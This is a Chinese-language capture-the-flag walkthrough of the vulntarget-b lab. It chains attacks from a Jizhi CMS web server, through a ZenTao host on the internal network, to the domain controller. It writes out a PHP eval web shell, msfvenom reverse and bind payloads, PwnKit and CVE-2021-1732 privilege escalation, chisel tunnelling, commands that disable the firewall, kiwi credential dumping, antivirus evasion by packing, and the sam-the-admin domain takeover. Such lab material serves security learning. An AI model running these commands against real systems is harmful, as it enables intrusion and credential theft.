实验目标:拿下域控中的
flag.txt
学习目标:极致CMS相关漏洞/禅道CMS相关漏洞/隧道代理/免杀/CVE-2021-1732/CVE-2021-42287/CVE-2021-42278
靶机下载:其中vulntarget-b为本次实验机器
百度云:
链接: https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q 提取码:1p9p
》》》靶机信息《《《
#攻击机
OS:Kali 2022.2
外NIC:192.168.x.x (桥接模式)(与Centos-7主机进行通信)
#Web Server
OS:Centos 7
Server:极致CMS/宝塔
username:root/vulntarget
password:root
外NIC:192.168.x.x (桥接模式)(与Kali通信)
内NIC:10.0.20.30 (仅主机模式)(与内网Win10主机即域成员进行通信)
#域成员-Win10
OS:Windows 10
Server:禅道CMS/火绒
本地账户:
win10:win10#123
administrator:admin@123
域成员:
vulntarget\win101:admin#123
Web后台:
admin:Admin123
内NIC:10.0.20.66 (仅主机模式)(与Centos 7即WEB主机进行通信)
内NIC:10.0.10.99 (仅主机模式)(与Win2016即域控通信)
#域控-Wins16
OS:Windows Server 2016
Server:AD DC
username:vulntarget\administrator
password:Admin@123
内网NIC:10.0.10.100 (仅主机模式)(与Win2016即域内成员通信)(能够Ping通Win2016主机)
一:边界主机
步骤一:在边界主机中登录并修改网卡配置文件ifcfg-ens33
将其中IP地址信息改为与桥网络同一网段的IP地址
#编辑配置文件
vi /etc/sysconfig/network-scripts/ifcfg-ens33
#修改内容信息(能够与攻击机相互通信)
IPADDR=192.168.50.106 //修改
NETMASK=255.255.255.0 //修改
GATEWAY=192.168.50.1 //修改
0x00:信息收集
步骤二:使用Nmap对目标主机进行扫描…发现开放:21/22/80/81/888/3306/8888
等端口…
nmap -sT -Pn 192.168.50.106
步骤三:访问后发现80为宝塔默认页面/81为极致CMS站点/8888为宝塔登录入口…下一步从极致CMS站点入手…
步骤四:使用Dirb
扫描目标敏感目录…发现后台登录与版本信息…
#扫描命令
dirb http://192.168.50.106:81/
#扫描信息
http://192.168.50.106:81/admin.php/Login/index.html //后台登录
http://192.168.50.106:81/readme.txt //版本信息
http://192.168.50.106:81/robots.txt //敏感目录
0x01:漏洞利用
步骤五:根据以上扫描收集到的信息搜索该极致CMS Beta1.8.1
的漏洞发现存在后台GetShell…尝试使用BP进行爆破,测试验证存在验证码复用且爆破结果为默认用户密码admin:admin123
进行登录,成功…
步骤六:开始后台GetShell,点击扩展管理
–>插件列表
–>找到在线编辑模板
–>下载
–>安装
–>配置
–>输入账户密码
–>点击立即提交
–>跳转到在线文件管理工具
–>登录即可
步骤七:在在线文件管理器中新建文件并写入一句话木马,测试访问并用蚁剑链接…
0x02:绕过disable_functions
步骤八:在Shell中执行命令时返回ret=127
可能是宝塔禁用了命令执行的函数,这里使用蚁剑的插件进行绕过执行命令…测试发现还是有些命令执行不了…
步骤九:进行简要的信息收集…发现存在通往内网的网卡且当前权限为低权限需要提全…
#收集命令
id
whoami
uname -a
/sbin/ifconfig
cat /etc/passwd
#收集信息
低权限用户:www
可用用户:root/vulntarget
网卡信息:192.168.50.106/10.0.20.30
步骤十:使用MSF生成后门并上传到蚁剑中执行,进行反弹Shell…
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.50.46 LPORT=1234 -f elf -o outside.elf
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.50.46
set lport 1234
show options
run
0x03:权限提升
步骤十一:使用以下模块查找可提权的漏洞…这里直接使用cve_2021_4034_pwnkit_lpe_pkexec
进行提权限
run post/multi/recon/local_exploit_suggester
步骤十二:执行以下命令来进行提权…即可获取到最高权限root
#执行命令
bg
use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
set session 1
run
#注意事项
1.在云主机上的MSF一定要设置好Payload,且其中的LHOST为外网地址才能正常返回高权限的Shell
步骤十四:进入到Shell中获取到Flag…
vulntarget{get-one-centos-privilage-promotion}
二:域内主机
0x00:内网信息收集
步骤一:在MSF中查看路由信息并添加路由…
run post/multi/manage/autoroute #添加路由
run autoroute -p #查看路由
步骤二:使用MSF的PortScan模块对内网进行主机存活及端口开放扫描…发现内网10.0.20.66
开放8080
端口
use auxiliary/scanner/portscan/tcp
set rhost 10.0.20.0/24
set ports 21,22,80,135,139,445,8080
set threads 30
run
步骤三:上传fscan
到蚁剑并执行以下命令,发现10.0.20.66
主机为存活且开放3306/8080
端口…
#项目地址
https://github.com/shadow1ng/fscan
#执行命令
./fscan_amd64 -h 10.0.20.0/24 -np #-np 禁ping扫描
步骤四:这里使用chisel
进行流量代理的搭建…这里搭建反向流量代理…使用浏览器测试访问内网站点…
#项目地址
https://github.com/jpillora/chisel
#Kali执行命令
./chisel server -p 50050 --reverse
#边界主机执行命令
./chisel client 192.168.50.46:50050 R:socks
#代理配置
127.0.0.1 1080 socks5
0x01:内网Web攻击
步骤五:访问以下地址可获取该CMS的版本…在网络上搜索该禅道CMS系统的漏洞,发现存在CNVD-C-2020-121325
漏洞,直接复现!!!
http://10.0.20.66:8080/index.php?mode=getconfig
步骤六:先尝试弱口令登录,尝试几次后处罚防护机制故取出使用BP爆破的思路,尝试在边界主机上爆破的账号密码admin:Admin123
即可登录成功…
步骤七:在边界主机上写入一句话木马并开启HTTP服务器对内网主机提供下载…并将提供出来一句话木马下载地址进行base64编码…
#将木马写入到第一层的centos机器中
echo "<?php @eval(\$_POST['cmd']); ?> " >1.php #$前加一个反斜杠转义
#开启python的http服务
python -c 'import pty; pty.spawn("/bin/bash")' //交互式
python -m SimpleHTTPServer 4567
python -m SimpleHTTPServer 7089
#base64编码
HTTP://10.0.20.33:4567/1.php
SFRUUDovLzEwLjAuMjAuMzM6NDU2Ny8xLnBocA==
步骤八:进行GetShell,将以上步骤得到base64
编码值放到link
参数后面下载后门文件,访问特定地址即可获取到Shell地址…蚁剑链接访问…
#漏洞利用
http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzM6NDU2Ny8xLnBocA==
#Shell地址
http://10.0.20.66:8080/data/client/1/1.php
步骤九:执行以下命令进行信息收集…
#whoami /priv
iis apppool\zentao
#system
OS:Windows 10 18363 专业版
#ipconfig
NIC1:10.0.20.66
NIC2:10.0.10.99
#systeminfo
#net time /domain
域:vulntarget.com
域控IP:10.0.10.100
#tasklist /svc
火绒/windows defender
#查看防火墙状态
netsh advfirewall show allprofile state
#关闭防火墙
netsh advfirewall set allprofile state off
步骤十:通过以上信息判断为低权限且为域内主机,在MSF上生成正向链接木马加壳并在蚁剑运行上线…
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=6061 -f exe > inside.exe
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 6061
set Rhost 10.0.20.66
run
加壳免杀:http://www.ucbug.com/soft/33605.html
0x02:内网Web提权
步骤十一:在MSF中使用以下模块搜索漏洞利用模块进行提权…未果在公网上搜索相关提权漏洞…
meterpreter > run post/multi/recon/local_exploit_suggester
步骤十二:在公网找到CVE-2021-1732
针对于Windows 10的提权漏洞…Github上寻找并在下载放置到蚁剑中执行测试…这里同样需要加壳绕过火绒…
#提权项目
源项目地址:https://github.com/shanfenglan/test/blob/master/cve-2021-1732.exe
备份地址:https://github.com/sukusec301/test/blob/master/cve-2021-1732.exe
#使用方式
cve-2021-1732.exe whoami
步骤十三:使用MSF生成正向连接马并加壳,开启MSF监听并执行以下命令就能上线System
权限的Shell…
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=6062 -f exe > i2side.exe
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 6062
set rhost 10.0.20.66
run
cve-2021-1732_se.exe i2side_se.exe
步骤十四:尝试抓取密码…只抓取到了域成员是win101
账户的NTLM Hash解密得到密码admin#123;添加路由信息…
#抓取密码
load kiwi
cerds_all
kiwi_cmd sekurlsa::logonpasswords
#添加路由
run post/multi/manage/autoroute //添加路由
run autoroute -p //查看路由
三:域控服务
0x00:域内信息收集
步骤一:使用scaninfo
扫描内部存活主机…发现存活主机10.0.10.100
且扫描出主机账号密码信息…
#项目地址
https://github.com/redtoolskobe/scaninfo
#使用方法
scaninfo_windows_x64.exe -i 10.0.10.0/24
步骤二:也可使用MSF的Portscan模块对目标进行端口扫描…
use auxiliary/scanner/portscan/tcp
set rhost 10.0.10.100
set ports 21,22,80,135,139,445,8080
set threads 30
run
步骤三:使用最近的CVE-2021-42287/CVE-2021-42278漏洞来获取域控权限…配置代理与proxychains信息
#代理配置
use auxiliary/server/socks_proxy
show options
run
jobs
#proxychains配置
vi /etc/proxychains4.conf
socks5 127.0.0.1 1081
#链接测试
proxychains nmap -Pn -p 110 -sT 10.0.10.110
0x01:域控服务攻击
步骤四:编辑本地Host文件修改域名信息并下载漏洞攻击项目到本地…使用Python脚本并按照以下格式攻击即可获取到域控的Shell…
#vi /etc/hosts
10.0.10.100 vulntarget.com
#漏洞项目下载
https://github.com/WazeHell/sam-the-admin
#漏洞攻击使用
proxychains python3 sam_the_admin.py "域名/域用户:用户密码" -dc-ip 域控IP -shell
proxychains python3 sam_the_admin.py "vulntarget.com/win101:admin#123" -dc-ip 10.0.10.100 -shell
步骤五:进入到域控管理员的家目录发现flag.txt
…查看内容为如下
再次恭喜拿下域控 +_+
打印机漏洞,CVE-2021-42287/CVE-2021-42278 域内提权 GET
vulntarget{domain-continue}
参考链接:
https://blog.csdn.net/zhangge3663/article/details/116430637/
https://blog.csdn.net/qq_36197704/article/details/109385695
https://blog.csdn.net/kelenwait/article/details/117676942
https://cloud.tencent.com/developer/article/1928565
https://cloud.tencent.com/developer/article/1926625
https://zhuanlan.zhihu.com/p/360149991